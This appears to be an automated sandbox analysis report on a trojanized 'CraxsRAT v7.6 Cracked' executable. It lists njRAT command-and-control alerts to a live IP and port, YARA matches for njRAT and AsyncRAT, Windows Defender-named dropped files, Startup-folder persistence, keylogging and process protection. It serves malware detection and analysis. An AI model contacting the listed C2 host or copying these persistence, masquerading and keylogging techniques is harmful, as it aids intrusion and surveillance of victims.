Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54092 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54107 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54107 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54096 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54108 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54104 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54095 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54108 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54109 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54108 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54095 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54109 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54095 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54103 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54088 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54079 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54103 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54076 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54098 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54103 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54093 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54106 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54086 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54086 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54086 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54097 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54111 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54113 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54081 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54101 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54100 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54100 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54080 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54111 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54113 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54113 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54100 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54114 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54114 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54081 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54080 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54103 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54105 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54116 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54105 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54111 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54116 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54102 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54102 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54102 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54120 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54120 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54115 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54115 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54115 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54120 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54105 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54112 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54112 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54112 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54122 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54122 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54109 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54114 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54119 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54119 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54124 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54124 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54125 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54118 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54125 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54113 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54080 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54126 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54118 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54081 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54122 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54126 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54116 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54129 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54129 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54115 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54121 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54121 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54128 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54131 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54121 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54128 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54117 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54117 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54131 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54085 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54117 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54085 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54125 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54135 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54135 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54118 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54123 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54123 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54124 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54129 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54110 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54110 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54126 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54110 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54127 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54127 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54138 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54138 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54127 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54130 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54131 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54130 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54140 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54140 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54121 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54134 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54134 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54141 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54142 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54141 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54110 -> 45.145.41.178:2222

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 45.145.41.178

Yara detected Generic Downloader

Source: Yara match

File source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe, type: DROPPED

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.5:63387 -> 45.145.41.178:2222

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: NNT-AS41228LT NNT-AS41228LT

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.5:53729
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.5:53717
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.5:49704

Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: Windows Defender Real Time Protection.exe.0.dr, kl.cs	.Net Code: VKCodeToUnicode
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, kl.cs	.Net Code: VKCodeToUnicode
Source: 0e75fed00639ea9e725255499292dcdd.exe.2.dr, kl.cs	.Net Code: VKCodeToUnicode

E-Banking Fraud

Yara detected Njrat

Source: Yara match	File source: 2.0.Windows Defender Real Time Protection.exe.a30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000000.2145187329.0000000000A32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4633722381.0000000002FF6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe, type: DROPPED

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe

Process information set: 01 00 00 00

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.0.Windows Defender Real Time Protection.exe.a30000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 2.0.Windows Defender Real Time Protection.exe.a30000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 2.0.Windows Defender Real Time Protection.exe.a30000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 2.0.Windows Defender Real Time Protection.exe.a30000.0.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.Windows Defender Real Time Protection.exe.a30000.0.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
